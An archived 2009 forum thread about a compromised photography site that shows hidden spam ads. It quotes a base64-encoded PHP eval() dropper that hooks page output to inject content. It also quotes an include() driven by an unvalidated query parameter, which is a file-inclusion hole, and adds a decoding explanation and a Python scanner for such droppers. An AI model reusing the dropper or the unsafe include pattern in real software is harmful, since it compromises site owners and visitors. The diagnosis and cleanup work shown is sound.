View Full Version : hidden ads on pages

gn0me
04-21-2009, 01:08 PM
I've been trying to figure out how this has been happening, but haven't found a solution yet. I have a HUGE chunk of jumbled text ads hidden in a div on my site, but how they're getting there I just don't know. You can view the source of the page here http://validator.w3.org/check?uri=http%3A%2F%2Fwww.buzzdphoto.com%2F&charset=(detect+automatically)&doctype=Inline&ss=1&group=0&user-agent=W3C_Validator%2F1.654

Scroll to line 34 on that page and you'll see what I'm talking about. It was suggested to me in an online chat with support that maybe this code was causing the trouble. Any thoughts?


<div id="content">
<?php // autodefine globals deprecated
$p = $_GET["p"];                // taken straight from the query string, no validation at all
if (! file_exists("$p.php"))    // only checks that the file exists, not where it lives: "../" segments pass
{
    include("services.php");
}
else
{
    include("$p.php");          // whatever passed the check above is executed as PHP
}
?>
</div>

Also, this is at the top of almost every PHP page. Maybe it has something to do with these ads?


<? /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl 9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ3NoX25vJ10pKXsk R0xPQkFMU1snc2hfbm8nXT0xO2lmKGZpbGVfZXhpc3RzKCcvaG 9tZS9idXp6ZHBoby9wdWJsaWNfaHRtbC9ibG9nL3dwLWluY2x1 ZGVzL2pzL3RpbnltY2UvdGhlbWVzL2FkdmFuY2VkL3NraW5zL2 8yazcvaW1nL2NvcHBlci5waHAnKSl7aW5jbHVkZV9vbmNlKCcv aG9tZS9idXp6ZHBoby9wdWJsaWNfaHRtbC9ibG9nL3dwLWluY2 x1ZGVzL2pzL3RpbnltY2UvdGhlbWVzL2FkdmFuY2VkL3NraW5z L28yazcvaW1nL2NvcHBlci5waHAnKTtpZihmdW5jdGlvbl9leG lzdHMoJ2dtbCcpJiYhZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcp KXtpZighZnVuY3Rpb25fZXhpc3RzKCdnemRlY29kZScpKXtmdW 5jdGlvbiBnemRlY29kZSgkUjIwRkQ2NUU5Qzc0MDYwMzRGQURD NjgyRjA2NzMyODY4KXskUjZCNkU5OENERThCMzMwODdBMzNFNE QzQTQ5N0JEODZCPW9yZChzdWJzdHIoJFIyMEZENjVFOUM3NDA2 MDM0RkFEQzY4MkYwNjczMjg2OCwzLDEpKTskUjYwMTY5Q0QxQz Q3QjdBN0E4NUFCNDRGODg0NjM1RTQxPTEwOyRSMEQ1NDIzNkRB MjA1OTRFQzEzRkM4MUIyMDk3MzM5MzE9MDtpZigkUjZCNkU5OE NERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjQpeyRSMEQ1NDIz NkRBMjA1OTRFQzEzRkM4MUIyMDk3MzM5MzE9dW5wYWNrKCd2Jy xzdWJzdHIoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjcz Mjg2OCwxMCwyKSk7JFIwRDU0MjM2REEyMDU5NEVDMTNGQzgxQj IwOTczMzkzMT0kUjBENTQyMzZEQTIwNTk0RUMxM0ZDODFCMjA5 NzMzOTMxWzFdOyRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4OD Q2MzVFNDErPTIrJFIwRDU0MjM2REEyMDU5NEVDMTNGQzgxQjIw OTczMzkzMTt9aWYoJFI2QjZFOThDREU4QjMzMDg3QTMzRTREM0 E0OTdCRDg2QiY4KXskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRG ODg0NjM1RTQxPXN0cnBvcygkUjIwRkQ2NUU5Qzc0MDYwMzRGQU RDNjgyRjA2NzMyODY4LGNocigwKSwkUjYwMTY5Q0QxQzQ3QjdB N0E4NUFCNDRGODg0NjM1RTQxKSsxO31pZigkUjZCNkU5OENERT hCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjE2KXskUjYwMTY5Q0Qx QzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxPXN0cnBvcygkUjIwRk Q2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4LGNocigwKSwk UjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxKSsxO3 1pZigkUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZC JjIpeyRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFND ErPTI7fSRSQzRBNUI1RTMxMEVENEMzMjNFMDRENzJBRkFFMzlG NTM9Z3ppbmZsYXRlKHN1YnN0cigkUjIwRkQ2NUU5Qzc0MDYwMz RGQURDNjgyRjA2NzMyODY4LCRSNjAxNjlDRDFDNDdCN0E3QTg1 QUI0NEY4ODQ2MzVFNDEpKTtpZigkUkM0QTVCNUUzMTBFRDRDMz 
IzRTA0RDcyQUZBRTM5RjUzPT09RkFMU0UpeyRSQzRBNUI1RTMx MEVENEMzMjNFMDRENzJBRkFFMzlGNTM9JFIyMEZENjVFOUM3ND A2MDM0RkFEQzY4MkYwNjczMjg2ODt9cmV0dXJuICRSQzRBNUI1 RTMxMEVENEMzMjNFMDRENzJBRkFFMzlGNTM7fX1mdW5jdGlvbi BkZ29iaCgkUkRBM0U2MTQxNEU1MEFFRTk2ODEzMkYwM0QyNjVF MENGKXtIZWFkZXIoJ0NvbnRlbnQtRW5jb2Rpbmc6IG5vbmUnKT skUjNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRTkwPWd6 ZGVjb2RlKCRSREEzRTYxNDE0RTUwQUVFOTY4MTMyRjAzRDI2NU UwQ0YpO2lmKHByZWdfbWF0Y2goJy9cPGJvZHkvc2knLCRSM0Uz M0UwMTdDRDc2QjlCN0U2QzczNjRGQjkxRTJFOTApKXtyZXR1cm 4gcHJlZ19yZXBsYWNlKCcvKFw8Ym9keVteXD5dKlw+KS9zaScs JyQxJy5nbWwoKSwkUjNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0Rk I5MUUyRTkwKTt9ZWxzZXtyZXR1cm4gZ21sKCkuJFIzRTMzRTAx N0NENzZCOUI3RTZDNzM2NEZCOTFFMkU5MDt9fW9iX3N0YXJ0KC dkZ29iaCcpO319fQ==')); ?>

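What that blob actually does (decoded here as an editorial note; this is not from either poster): guarded by $GLOBALS['sh_no'] so it runs once per request, it checks for /home/buzzdpho/public_html/blog/wp-includes/js/tinymce/themes/advanced/skins/o2k7/img/copper.php and include_once()s it, defines a gzdecode() fallback, then registers an output-buffer callback dgobh() with ob_start('dgobh'). That callback sends Content-Encoding: none, gunzips the buffered page if needed, and uses preg_replace('/(\<body[^\>]*\>)/si', '$1'.gml(), ...) to splice the return value of gml() (defined in copper.php) directly after the <body> tag, or prepends it when there is no <body>. That is the hidden div at line 34. The script below is an added example, not code from the thread: it finds eval(base64_decode('...')) droppers across a web root, decodes them even when the base64 has been wrapped with spaces as it is above, and summarises what each one hooks, includes and sends. The sample file it builds is constructed to mirror the dropper's shape with the copper.php path from the decoded blob; gml() itself is not on the page, so the ad content is not reproduced.

```python
"""Find and summarise eval(base64_decode(...)) droppers in PHP sources.

Added example for this thread, not code from the forum posts. The
constructed sample below mirrors the structure of the dropper in the
first post; the copper.php path is the one that dropper decodes to."""
import base64
import os
import re
import sys

# eval(base64_decode('...')) where the blob may be wrapped across lines (\s allowed inside)
EVAL_B64 = re.compile(
    r"eval\s*\(\s*base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=\s]+)['\"]\s*\)\s*\)"
)
OB_CALLBACK = re.compile(r"ob_start\s*\(\s*['\"](\w+)['\"]\s*\)")
PATHS = re.compile(
    r"(?:include_once|include|require_once|require|file_exists)\s*\(\s*['\"]([^'\"]+)['\"]"
)
HEADERS = re.compile(r"header\s*\(\s*['\"]([^'\"]+)['\"]", re.IGNORECASE)
BODY_HOOK = re.compile(r"preg_replace\s*\(\s*['\"][^'\"]*<body", re.IGNORECASE)

# Path the thread's blob decodes to; the payload shape is reproduced, gml() itself is not on the page.
COPPER_PATH = ("/home/buzzdpho/public_html/blog/wp-includes/js/tinymce/themes/"
               "advanced/skins/o2k7/img/copper.php")

# Constructed stand-in for the decoded dropper: same control flow, shorter.
SAMPLE_PAYLOAD = (
    "if(function_exists('ob_start')&&!isset($GLOBALS['sh_no'])){$GLOBALS['sh_no']=1;"
    "if(file_exists('" + COPPER_PATH + "')){include_once('" + COPPER_PATH + "');"
    "function dgobh($buf){Header('Content-Encoding: none');"
    "if(preg_match('/\\<body/si',$buf)){return preg_replace('/(\\<body[^\\>]*\\>)/si','$1'.gml(),$buf);}"
    "return gml().$buf;}ob_start('dgobh');}}"
)


def decode_blob(blob):
    """Decode a base64 blob, tolerating the whitespace that forum or mail wrapping inserts."""
    return base64.b64decode(re.sub(r"\s+", "", blob)).decode("latin-1", "replace")


def analyze_php(src):
    """Return one finding per eval(base64_decode()) in src, with the decoded payload summarised."""
    findings = []
    for m in EVAL_B64.finditer(src):
        payload = decode_blob(m.group(1))
        findings.append({
            "offset": m.start(),
            "payload": payload,
            "ob_callbacks": OB_CALLBACK.findall(payload),   # output-buffer hooks = page rewriting
            "paths": sorted(set(PATHS.findall(payload))),   # other files the dropper depends on
            "headers": HEADERS.findall(payload),
            "injects_after_body": bool(BODY_HOOK.search(payload)),
        })
    return findings


def make_sample_file(payload):
    """Constructed PHP file in the shape of the thread's: dropper on line 1, base64 wrapped every 64 chars."""
    b64 = base64.b64encode(payload.encode("latin-1")).decode("ascii")
    wrapped = " ".join(b64[i:i + 64] for i in range(0, len(b64), 64))
    return "<? /**/eval(base64_decode('" + wrapped + "')); ?>\n<?php echo 'real page'; ?>\n"


def scan_tree(root, exts=(".php", ".inc", ".phtml")):
    """Walk a web root and return {path: findings} for every file carrying a dropper."""
    hits = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.endswith(exts):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, "r", encoding="latin-1") as fh:
                    found = analyze_php(fh.read())
            except OSError:
                continue
            if found:
                hits[path] = found
    return hits


if __name__ == "__main__":
    # Usage: python find_droppers.py /home/buzzdpho/public_html
    for path, found in sorted(scan_tree(sys.argv[1] if len(sys.argv) > 1 else ".").items()):
        for f in found:
            print("%s: offset %d, ob_start->%s, splices after <body>: %s, needs %s"
                  % (path, f["offset"], f["ob_callbacks"], f["injects_after_body"], f["paths"]))
```

The file name find_droppers.py is my choice; grep -rl 'eval(base64_decode' public_html gives the quick list without the decoding. The blob from the post can be pasted straight into decode_blob(), spaces and all, to read it. Because the dropper sits at the top of almost every PHP file, cleaning the one page with the visible div is not enough: every hit has to be removed, copper.php deleted, and whatever had write access to those files (hosting and FTP credentials, the WordPress install under /blog) checked, otherwise the rewrite is likely to be repeated.
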
pghcollectibles
04-21-2009, 05:14 PM
Here is where you learn about script injection or XSS:

http://www.php.net/manual/en/function.base64-decode.php
http://www.php.net/manual/en/function.eval.php

PHP code to start a comment block is /*
PHP code to end a comment block is */

You have given access to the outside world by accepting almost anything into the p variable. You have a link that makes the index page accept p=contact, but you are not preventing p from being many other things that could change the output of your code.

Besides Java form validation, you can filter PHP variables to accept only data that is equal or similar to what you want (text, numbers, characters, etc.).

This is some variable info if you don't know already:
http://www.php.net/manual/en/language.variables.external.php

There are many functions that can be applied to a variable in this list (http://www.php.net/manual/en/ref.strings.php); just read their descriptions. More commonly, other filters (http://www.php.net/manual/en/filter.filters.php) can be applied using this function (http://www.php.net/manual/en/function.filter-input.php), and that would probably help eliminate your threat.

How about the "too vague" approach?

This is your code:

<?php // autodefine globals deprecated
$p = $_GET["p"];
if (! file_exists("$p.php"))
{
    include("services.php");
}
else
{
    include("$p.php");
}
?>

You have three pages; how about using this for your code:

<?php
$p = isset($_GET["p"]) ? $_GET["p"] : "";  // avoid an undefined-index notice when p is absent
if ($p == "contact") {
    include("contact.php");
} else if ($p == "portfolio") {
    include("portfolio.php");
} else {
    include("services.php");
}
$p = ""; // this would reset the variable to nothing to make sure it wasn't echoed later from some other injection
?>

gn0me
04-22-2009, 02:41 AM
Excellent! I had a distant feeling it might've had something to do with some sort of injection. Wasn't entirely sure. Thanks so much for the resources :)